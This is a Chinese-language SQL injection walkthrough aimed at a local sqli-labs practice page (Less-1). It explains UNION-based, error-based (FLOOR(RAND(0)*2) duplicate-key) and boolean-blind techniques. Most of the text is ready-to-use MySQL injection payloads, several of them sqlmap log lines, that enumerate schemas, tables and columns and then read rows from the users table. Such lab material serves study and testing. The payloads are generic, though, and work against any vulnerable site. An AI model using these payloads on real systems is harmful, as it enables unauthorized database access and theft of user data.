目标
http://localhost/?id=2
http://localhost/?id=2' 有回显错误(加上单引号后页面回显MySQL语法错误,说明参数是以字符串形式拼接进SQL语句,且数据库错误信息会直接显示在页面上)

Error-based injection(说明:下面先用UNION联合查询直接把数据回显到页面;从"Attack vector"一节开始才是真正依赖报错信息的报错注入)

猜解列数:用 UNION ALL SELECT NULL,NULL,... 逐个增加NULL的个数直到页面返回正常。因为是在GET请求的URL中,# 会被浏览器当作URL片段(fragment)而不会发送到服务器,所以要用%23代替#来注释掉原语句后面的部分

http://localhost/sqli/Less-1/?id=2' UNION ALL SELECT NULL,NULL,NULL%23

返回正常,确定列数为3(NULL的个数与原查询列数不一致时MySQL会报错:The used SELECT statements have a different number of columns;也可以用 ORDER BY n 递增直到报错来判断列数)

判断回显在哪个位置,用CONCAT(0x61,0x62,0x63)(即字符串 abc 的十六进制写法,可以避免在payload中使用引号)依次取代每一个NULL,观察页面中哪个位置出现 abc

http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, concat(0x61,0x62,0x63),NULL%23

页面中出现回显(id=-2 使原始查询没有匹配行,页面显示的就是UNION带出的那一行,所以第二个位置处会出现 abc)

PS:有时也直接用正的id(如下),但这通常要求页面能同时显示多行结果,否则页面只显示原始查询的第一行而看不到UNION带出的数据:http://localhost/sqli/Less-1/?id=2' UNION ALL SELECT NULL, concat(0x61,0x62,0x63),NULL%23

于是我们可以使用如下PAYLOAD获取一些信息

http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, [QUERY HERE],NULL%23
http://localhost/sqli/Less-1/?id=-2' UNION ALL SELECT NULL, version(),NULL%23
Attack vector(报错注入模板,也就是下面sqlmap日志中所用的形式)。原理:FLOOR(RAND(0)*2) 在 GROUP BY 时会产生可预测的重复分组键,MySQL 抛出 Duplicate entry '...' for key 'group_key' 错误,并把拼接进分组键的 [QUERY] 结果一并带回到错误信息中。[RANDNUM] 是任意数字占位符;[DELIMITER_START]/[DELIMITER_STOP] 是便于从页面中定位结果的分隔符(日志中的 0x71766a6271、0x7176787a71 等十六进制串即 qvjbq、qvxzq)。注意两点:FROM 后面的表至少要有3行(INFORMATION_SCHEMA.CHARACTER_SETS 满足);MySQL 错误信息中的键值通常会被截断(约64字节),所以后面的payload都用 MID(...,1,50) 限制长度:
AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

获取数据库总数
字符型(这里用的是UNION回显,0x71766a6271 / 0x7176787a71 是前后分隔符,IFNULL(...,0x20) 把NULL替换为空格以免整个CONCAT结果变为NULL):

http://localhost/sqli/Less-1/?id=-6021' UNION ALL SELECT NULL,CONCAT(0x71766a6271,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176787a71),NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

数字型(id 不加引号直接拼接时的写法,下面第一条是sqlmap日志,第二条是同一思路在本目标字符型参数上的写法):

[23:42:32] [PAYLOAD] 1 AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x71706b6271,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x716b7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

http://localhost/sqli/Less-1/?id=2' AND (SELECT 3770 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fFqF'='fFqF

获取数据库名称,LIMIT 1,1 中的第一个数字(原文标红处)是偏移量,即第几个数据库(从0开始计);MID(...,1,50) 只取前50个字符,是为了避开MySQL报错信息对长度的截断

[23:12:22] [PAYLOAD] 2' AND (SELECT 2968 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IeIo'='IeIo

获取表的数量,table_schema IN (0x7365637572697479) 中的十六进制串(原文标红处)是数据库名 security 的十六进制编码,用十六进制可以避免在payload中出现引号

[23:23:12] [PAYLOAD] 2' AND (SELECT 9361 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xlSl'='xlSl

获取表名,LIMIT 3,1 中的 3(原文标红处)是偏移量,即第几张表(从0开始计)

[23:23:12] [PAYLOAD] 2' AND (SELECT 8267 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aHHQ'='aHHQ

获取列的数量,table_name=0x7573657273(即 users)为表名,table_schema=0x7365637572697479(即 security)为数据库名,两处在原文中分别标红

[23:29:07] [PAYLOAD] 2' AND (SELECT 8220 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'btHc'='btHc

获取列名(LIMIT 0,1 中的第一个数字是列的偏移量,逐个递增即可枚举该表的所有列)

[23:29:07] [PAYLOAD] 2' AND (SELECT 2340 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uKNV'='uKNV

获取列的类型(查 column_type,LIMIT 偏移与上一条取列名的payload一致时对应同一列)

[23:29:07] [PAYLOAD] 2' AND (SELECT 1078 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HJtM'='HJtM

获取表共有多少行(直接对 security.users 做 COUNT(id))

[23:34:04] [PAYLOAD] 2' AND (SELECT 9821 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT IFNULL(CAST(COUNT(id) AS CHAR),0x20) FROM security.users),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jvPy'='jvPy

获取内容(ORDER BY id LIMIT 0,1 取排序后第一行的 id,改动 LIMIT 偏移和列名即可逐行逐列读出数据)

[23:34:04] [PAYLOAD] 2' AND (SELECT 5792 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM security.users ORDER BY id LIMIT 0,1),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qGtS'='qGtS

Boolean-Blind Injection(布尔盲注:页面既不回显错误也不回显数据,只能根据条件为真/假时页面的差异逐字符猜解。ORD(MID(...,n,1)) 取出第n个字符的ASCII码,与 >49、>64 这类阈值比较,通过二分逐步确定字符)

猜解数据库数量,MID(...,1,1) 中的第一个 1(原文标红处)表示这个数字的第几位;>49 即与字符 '1' 的ASCII码比较

ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>49 AND 'nTcW'='nTcW

猜解数据库名称,LIMIT 0,1(原文红色部分)表示第几个数据库,MID(...,1,1) 中的 1(原文蓝色部分)表示数据库名字的第几个字符

ID:1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>64 AND 'RFNY'='RFNY

猜解表的数量,table_schema=0x7365637572697479(原文红色部分)为数据库名 security 的十六进制编码,MID(...,1,1) 中的 1(原文蓝色部分)为这个数字的第几位

ID:1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>51 AND 'HkNZ'='HkNZ

猜解表名(LIMIT 0,1 为第几张表,MID(...,1,1) 为表名的第几个字符;>64 即与 '@' 比较,相当于先判断该字符是否在字母区间)

ID:1' AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),1,1))>64 AND 'GKOZ'='GKOZ